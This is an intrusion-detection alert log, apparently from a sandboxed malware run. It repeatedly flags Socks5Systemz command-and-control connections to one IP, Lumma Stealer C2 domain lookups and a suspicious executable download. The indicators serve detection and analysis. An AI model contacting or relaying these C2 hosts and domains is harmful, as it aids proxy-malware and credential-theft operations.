2024-11-15T14:11:35.935800+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50156	185.208.158.202	80	TCP
2024-11-15T14:11:35.935800+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50156	185.208.158.202	80	TCP
2024-11-15T14:11:36.939227+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.4	50157	185.215.113.16	80	TCP
2024-11-15T14:11:37.389803+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50158	185.208.158.202	80	TCP
2024-11-15T14:11:37.389803+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50158	185.208.158.202	80	TCP
2024-11-15T14:11:38.436489+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50160	185.208.158.202	80	TCP
2024-11-15T14:11:38.436489+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50160	185.208.158.202	80	TCP
2024-11-15T14:11:39.486368+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50162	185.208.158.202	80	TCP
2024-11-15T14:11:39.486368+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50162	185.208.158.202	80	TCP
2024-11-15T14:11:39.860312+0100	2057396	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs)	1	192.168.2.4	62100	1.1.1.1	53	UDP
2024-11-15T14:11:40.525171+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50163	185.208.158.202	80	TCP
2024-11-15T14:11:40.525171+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50163	185.208.158.202	80	TCP
2024-11-15T14:11:41.574214+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50165	185.208.158.202	80	TCP
2024-11-15T14:11:41.574214+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50165	185.208.158.202	80	TCP
2024-11-15T14:11:42.003672+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50165	185.208.158.202	80	TCP
2024-11-15T14:11:42.003672+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50165	185.208.158.202	80	TCP
2024-11-15T14:11:43.563186+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50166	185.208.158.202	80	TCP
2024-11-15T14:11:43.563186+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50166	185.208.158.202	80	TCP
2024-11-15T14:11:44.766294+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50168	185.208.158.202	80	TCP
2024-11-15T14:11:44.766294+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50168	185.208.158.202	80	TCP
2024-11-15T14:11:45.796735+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50169	185.208.158.202	80	TCP
2024-11-15T14:11:45.796735+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50169	185.208.158.202	80	TCP
2024-11-15T14:11:47.058641+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50171	185.208.158.202	80	TCP
2024-11-15T14:11:47.058641+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50171	185.208.158.202	80	TCP
2024-11-15T14:11:47.478330+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50171	185.208.158.202	80	TCP
2024-11-15T14:11:47.478330+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50171	185.208.158.202	80	TCP
2024-11-15T14:11:48.602771+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50172	185.208.158.202	80	TCP
2024-11-15T14:11:48.602771+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50172	185.208.158.202	80	TCP
2024-11-15T14:11:49.741912+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50175	185.208.158.202	80	TCP
2024-11-15T14:11:49.741912+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50175	185.208.158.202	80	TCP
2024-11-15T14:11:50.866576+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50176	185.208.158.202	80	TCP
2024-11-15T14:11:50.866576+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50176	185.208.158.202	80	TCP
2024-11-15T14:11:51.936796+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50178	185.208.158.202	80	TCP
2024-11-15T14:11:51.936796+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50178	185.208.158.202	80	TCP
2024-11-15T14:11:53.056549+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50180	185.208.158.202	80	TCP
2024-11-15T14:11:53.056549+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50180	185.208.158.202	80	TCP
2024-11-15T14:11:53.490407+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50180	185.208.158.202	80	TCP
2024-11-15T14:11:53.490407+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50180	185.208.158.202	80	TCP
2024-11-15T14:11:54.627653+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50182	185.208.158.202	80	TCP
2024-11-15T14:11:54.627653+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50182	185.208.158.202	80	TCP
2024-11-15T14:11:55.696513+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50184	185.208.158.202	80	TCP
2024-11-15T14:11:55.696513+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50184	185.208.158.202	80	TCP
2024-11-15T14:11:56.115659+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50184	185.208.158.202	80	TCP
2024-11-15T14:11:56.115659+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50184	185.208.158.202	80	TCP
2024-11-15T14:11:57.165798+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50185	185.208.158.202	80	TCP
2024-11-15T14:11:57.165798+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50185	185.208.158.202	80	TCP
2024-11-15T14:11:57.598625+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50185	185.208.158.202	80	TCP
2024-11-15T14:11:57.598625+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50185	185.208.158.202	80	TCP
2024-11-15T14:11:58.019649+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50185	185.208.158.202	80	TCP
2024-11-15T14:11:58.019649+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50185	185.208.158.202	80	TCP
2024-11-15T14:11:58.728269+0100	2057396	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs)	1	192.168.2.4	58211	1.1.1.1	53	UDP
2024-11-15T14:11:59.153743+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50187	185.208.158.202	80	TCP
2024-11-15T14:11:59.153743+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50187	185.208.158.202	80	TCP
2024-11-15T14:11:59.570488+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50187	185.208.158.202	80	TCP
2024-11-15T14:11:59.570488+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50187	185.208.158.202	80	TCP
2024-11-15T14:12:00.602012+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50190	185.208.158.202	80	TCP
2024-11-15T14:12:00.602012+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50190	185.208.158.202	80	TCP
2024-11-15T14:12:01.667170+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50191	185.208.158.202	80	TCP
2024-11-15T14:12:01.667170+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50191	185.208.158.202	80	TCP
2024-11-15T14:12:02.093683+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50191	185.208.158.202	80	TCP
2024-11-15T14:12:02.093683+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50191	185.208.158.202	80	TCP
2024-11-15T14:12:03.632226+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50193	185.208.158.202	80	TCP
2024-11-15T14:12:03.632226+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50193	185.208.158.202	80	TCP
2024-11-15T14:12:04.664053+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50196	185.208.158.202	80	TCP
2024-11-15T14:12:04.664053+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50196	185.208.158.202	80	TCP
2024-11-15T14:12:05.700728+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50198	185.208.158.202	80	TCP
2024-11-15T14:12:05.700728+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50198	185.208.158.202	80	TCP
2024-11-15T14:12:06.113804+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50198	185.208.158.202	80	TCP
2024-11-15T14:12:06.113804+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50198	185.208.158.202	80	TCP
2024-11-15T14:12:07.147647+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50200	185.208.158.202	80	TCP
2024-11-15T14:12:07.147647+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50200	185.208.158.202	80	TCP
2024-11-15T14:12:08.183747+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50201	185.208.158.202	80	TCP
2024-11-15T14:12:08.183747+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50201	185.208.158.202	80	TCP
2024-11-15T14:12:09.221572+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50203	185.208.158.202	80	TCP
2024-11-15T14:12:09.221572+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50203	185.208.158.202	80	TCP
2024-11-15T14:12:09.630312+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50203	185.208.158.202	80	TCP
2024-11-15T14:12:09.630312+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50203	185.208.158.202	80	TCP
2024-11-15T14:12:10.672454+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50204	185.208.158.202	80	TCP
2024-11-15T14:12:10.672454+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50204	185.208.158.202	80	TCP
2024-11-15T14:12:11.707826+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50206	185.208.158.202	80	TCP
2024-11-15T14:12:11.707826+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50206	185.208.158.202	80	TCP
2024-11-15T14:12:12.824356+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50209	185.208.158.202	80	TCP
2024-11-15T14:12:12.824356+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50209	185.208.158.202	80	TCP
2024-11-15T14:12:13.863430+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50210	185.208.158.202	80	TCP
2024-11-15T14:12:13.863430+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50210	185.208.158.202	80	TCP
2024-11-15T14:12:14.896052+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50213	185.208.158.202	80	TCP
2024-11-15T14:12:14.896052+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50213	185.208.158.202	80	TCP
2024-11-15T14:12:15.936115+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50214	185.208.158.202	80	TCP
2024-11-15T14:12:15.936115+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50214	185.208.158.202	80	TCP
2024-11-15T14:12:16.970181+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50216	185.208.158.202	80	TCP
2024-11-15T14:12:16.970181+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50216	185.208.158.202	80	TCP
2024-11-15T14:12:18.015550+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50217	185.208.158.202	80	TCP
2024-11-15T14:12:18.015550+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50217	185.208.158.202	80	TCP
2024-11-15T14:12:19.060564+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50219	185.208.158.202	80	TCP
2024-11-15T14:12:19.060564+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50219	185.208.158.202	80	TCP
2024-11-15T14:12:20.098532+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50220	185.208.158.202	80	TCP
2024-11-15T14:12:20.098532+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50220	185.208.158.202	80	TCP
2024-11-15T14:12:21.161791+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50221	185.208.158.202	80	TCP
2024-11-15T14:12:21.161791+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50221	185.208.158.202	80	TCP
2024-11-15T14:12:21.574788+0100	2057396	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs)	1	192.168.2.4	54831	1.1.1.1	53	UDP
2024-11-15T14:12:22.201538+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50223	185.208.158.202	80	TCP
2024-11-15T14:12:22.201538+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50223	185.208.158.202	80	TCP
2024-11-15T14:12:23.234962+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50224	185.208.158.202	80	TCP
2024-11-15T14:12:23.234962+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50224	185.208.158.202	80	TCP
2024-11-15T14:12:24.290699+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50226	185.208.158.202	80	TCP
2024-11-15T14:12:24.290699+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50226	185.208.158.202	80	TCP
2024-11-15T14:12:25.333880+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50227	185.208.158.202	80	TCP
2024-11-15T14:12:25.333880+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50227	185.208.158.202	80	TCP
2024-11-15T14:12:26.382513+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50228	185.208.158.202	80	TCP
2024-11-15T14:12:26.382513+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50228	185.208.158.202	80	TCP
2024-11-15T14:12:27.419709+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50230	185.208.158.202	80	TCP
2024-11-15T14:12:27.419709+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50230	185.208.158.202	80	TCP
2024-11-15T14:12:28.683776+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50231	185.208.158.202	80	TCP
2024-11-15T14:12:28.683776+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50231	185.208.158.202	80	TCP
2024-11-15T14:12:29.734107+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50234	185.208.158.202	80	TCP
2024-11-15T14:12:29.734107+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50234	185.208.158.202	80	TCP
2024-11-15T14:12:30.838905+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50235	185.208.158.202	80	TCP
2024-11-15T14:12:30.838905+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50235	185.208.158.202	80	TCP
2024-11-15T14:12:31.889524+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50238	185.208.158.202	80	TCP
2024-11-15T14:12:31.889524+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50238	185.208.158.202	80	TCP
2024-11-15T14:12:32.948211+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50239	185.208.158.202	80	TCP
2024-11-15T14:12:32.948211+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50239	185.208.158.202	80	TCP
2024-11-15T14:12:34.015369+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50243	185.208.158.202	80	TCP
2024-11-15T14:12:34.015369+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50243	185.208.158.202	80	TCP
2024-11-15T14:12:35.135286+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50245	185.208.158.202	80	TCP
2024-11-15T14:12:35.135286+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50245	185.208.158.202	80	TCP
2024-11-15T14:12:36.269129+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50248	185.208.158.202	80	TCP
2024-11-15T14:12:36.269129+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50248	185.208.158.202	80	TCP
2024-11-15T14:12:37.353922+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50250	185.208.158.202	80	TCP
2024-11-15T14:12:37.353922+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50250	185.208.158.202	80	TCP
2024-11-15T14:12:38.443800+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50253	185.208.158.202	80	TCP
2024-11-15T14:12:38.443800+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50253	185.208.158.202	80	TCP
2024-11-15T14:12:39.629992+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50256	185.208.158.202	80	TCP
2024-11-15T14:12:39.629992+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50256	185.208.158.202	80	TCP
2024-11-15T14:12:40.790128+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50257	185.208.158.202	80	TCP
2024-11-15T14:12:40.790128+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50257	185.208.158.202	80	TCP
2024-11-15T14:12:41.917383+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50259	185.208.158.202	80	TCP
2024-11-15T14:12:41.917383+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50259	185.208.158.202	80	TCP
2024-11-15T14:12:42.959911+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50260	185.208.158.202	80	TCP
2024-11-15T14:12:42.959911+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50260	185.208.158.202	80	TCP
2024-11-15T14:12:43.990763+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50261	185.208.158.202	80	TCP
2024-11-15T14:12:43.990763+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50261	185.208.158.202	80	TCP
2024-11-15T14:12:45.022363+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50263	185.208.158.202	80	TCP
2024-11-15T14:12:45.022363+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50263	185.208.158.202	80	TCP
2024-11-15T14:12:46.122353+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50264	185.208.158.202	80	TCP
2024-11-15T14:12:46.122353+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50264	185.208.158.202	80	TCP
2024-11-15T14:12:47.215602+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50266	185.208.158.202	80	TCP
2024-11-15T14:12:47.215602+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50266	185.208.158.202	80	TCP
2024-11-15T14:12:48.276020+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50267	185.208.158.202	80	TCP
2024-11-15T14:12:48.276020+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50267	185.208.158.202	80	TCP
2024-11-15T14:12:49.341331+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50271	185.208.158.202	80	TCP
2024-11-15T14:12:49.341331+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50271	185.208.158.202	80	TCP
2024-11-15T14:12:50.405299+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50272	185.208.158.202	80	TCP
2024-11-15T14:12:50.405299+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50272	185.208.158.202	80	TCP
2024-11-15T14:12:51.444406+0100	2057396	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs)	1	192.168.2.4	53739	1.1.1.1	53	UDP
2024-11-15T14:12:51.464185+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50273	185.208.158.202	80	TCP
2024-11-15T14:12:51.464185+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50273	185.208.158.202	80	TCP
2024-11-15T14:12:52.500525+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50275	185.208.158.202	80	TCP
2024-11-15T14:12:52.500525+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50275	185.208.158.202	80	TCP
2024-11-15T14:12:53.558650+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50276	185.208.158.202	80	TCP
2024-11-15T14:12:53.558650+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50276	185.208.158.202	80	TCP
2024-11-15T14:12:54.586854+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50278	185.208.158.202	80	TCP
2024-11-15T14:12:54.586854+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50278	185.208.158.202	80	TCP
2024-11-15T14:12:55.623856+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50279	185.208.158.202	80	TCP
2024-11-15T14:12:55.623856+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50279	185.208.158.202	80	TCP
2024-11-15T14:12:56.697827+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50281	185.208.158.202	80	TCP
2024-11-15T14:12:56.697827+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50281	185.208.158.202	80	TCP
2024-11-15T14:12:57.740257+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50282	185.208.158.202	80	TCP
2024-11-15T14:12:57.740257+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50282	185.208.158.202	80	TCP
2024-11-15T14:12:58.790783+0100	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.4	50283	185.208.158.202	80	TCP
2024-11-15T14:12:58.790783+0100	2050112	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2	1	192.168.2.4	50283	185.208.158.202	80	TCP
